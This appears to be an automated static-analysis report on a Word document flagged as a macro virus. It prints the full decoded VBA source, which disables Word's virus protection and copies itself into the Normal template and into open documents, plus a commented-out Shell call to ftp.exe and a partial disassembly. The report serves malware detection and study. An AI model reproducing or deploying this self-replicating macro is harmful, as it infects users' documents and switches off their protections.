Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b9139283cc991a81…

MALICIOUS

Office (OLE)

27.5 KB Created: 2000-04-06 07:46:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 25d112e247204b4951ea3637f659df7c SHA-1: 2766e7265ffaf096625377bac943aff36bcef50a SHA-256: b9139283cc991a8102a9c1d76a23cec5ce2d0ca82ef1f96b2be66b61cee9755d
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code. The macro code attempts to write content to a temporary file and potentially execute it, though the specific execution command is commented out. The presence of the Shell() call and the macro execution strongly suggests a downloader or dropper functionality.

Heuristics 4

  • ClamAV: Doc.Trojan.Marker-43 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-43
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5784 bytes
SHA-256: dbb59e031e8ff2385175cb2c5bfca25fd6f49d646502e93368f53b7512294185
Detection
ClamAV: Doc.Trojan.Marker-25
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
On Error Resume Next

'DECLARATIONS

Dim sViralCode As String, nFreeFile As Integer
Dim oNormal As Object, oDocument As Object, sFileName As String
Dim rRange As Range

Const cIndicator = "INDIA"  ' CONSTANT TO FIND IF THE FILE IS ALREADY INFECTED OR NOT

    Options.VirusProtection = False 'SET VIRUS PROTECTION TO OFF MODE
    nFreeFile = FreeFile

    Randomize
    sFileName = "\India" + Str(32767 * Rnd) + ".txt"
    
    Open CurDir + sFileName For Output As #nFreeFile
        Write #nFreeFile, "Kashmir is an integral part of INDIA. JAI HIND"
    Close #nFreeFile
    
    Set oDocument = ActiveDocument.VBProject.VBComponents.Item(1)
    Set oNormal = NormalTemplate.VBProject.VBComponents.Item(1)
    
    If (oNormal.CodeModule.Find(cIndicator, 1, 1, 999, 999)) = False Then
        sViralCode = oDocument.CodeModule.Lines(1, oDocument.CodeModule.CountOfLines)
        ViralCode = ViralCode & Chr(10)
        oNormal.CodeModule.DeleteLines 1, oNormal.CodeModule.CountOfLines
        oNormal.CodeModule.AddFromString sViralCode
        
    End If

'    Shell "Command.com /c ftp.exe -n -s:" + CurDir + sFileName, vbHide
    
    If (oDocument.CodeModule.Find(cIndicator, 1, 1, 999, 999)) = False Then
        sViralCode = oNormal.CodeModule.Lines(1, oNormal.CodeModule.CountOfLines)
        ViralCode = ViralCode & Chr(10)
        oDocument.CodeModule.DeleteLines 1, oNormal.CodeModule.CountOfLines
        oDocument.CodeModule.AddFromString sViralCode
    End If
    
    ActiveDocument.Save
    NormalTemplate.Save
   
End Sub


' Virus Created By An Indian Citizen




' Processing file: /opt/analyzer/scan_staging/6f8d071dbc6347c09b7d30a9f30623c3.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3586 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Sub Document_Open())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' Line #4:
' 	QuoteRem 0x0000 0x000C "DECLARATIONS"
' Line #5:
' Line #6:
' 	Dim 
' 	VarDefn sViralCode (As String)
' 	VarDefn nFreeFile (As Integer)
' Line #7:
' 	Dim 
' 	VarDefn oNormal (As Object)
' 	VarDefn oDocument (As Object)
' 	VarDefn sFileName (As String)
' Line #8:
' 	Dim 
' 	VarDefn rRange (As Range)
' Line #9:
' Line #10:
' 	Dim (Const) 
' 	LitStr 0x0005 "INDIA"
' 	VarDefn cIndicator
' 	QuoteRem 0x001C 0x0038 " CONSTANT TO FIND IF THE FILE IS ALREADY INFECTED OR NOT"
' Line #11:
' Line #12:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' 	QuoteRem 0x0024 0x0020 "SET VIRUS PROTECTION TO OFF MODE"
' Line #13:
' 	Ld Friend 
' 	St nFreeFile 
' Line #14:
' Line #15:
' 	ArgsCall Read 0x0000 
' Line #16:
' 	LitStr 0x0006 "\India"
' 	LitDI2 0x7FFF 
' 	Ld Rnd 
' 	Mul 
' 	ArgsLd Str 0x0001 
' 	Add 
' 	LitStr 0x0004 ".txt"
' 	Add 
' 	St sFileName 
' Line #17:
' Line #18:
' 	Ld CurDir 
' 	Ld sFileName 
' 	Add 
' 	Ld nFreeFile 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #19:
' 	Ld nFreeFile 
' 	Sharp 
' 	WriteChan 
' 	LitStr 0x002E "Kashmir is an integral part of INDIA. JAI HIND"
' 	PrintItemNL 
' Line #20:
' 	Ld nFreeFile 
' 	Sharp 
' 	Close 0x0001 
' Line #21:
' Line #22:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set oDocument 
' Line #23:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set oNormal 
' Line #24:
' Line #25:
' 	Ld cIndicator 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x03E7 
' 	LitDI2 0x03E7 
' 	Ld oNormal 
' 	MemLd CodeModule 
' 	ArgsMemLd Find 0x0005 
' 	Paren 
' 	LitVarSpecial (False)
' 	Eq 
' 	IfBlock 
' Line #26:
' 	LitDI2 0x0001 
' 	Ld oDocument 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	Ld oDocument 
'
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.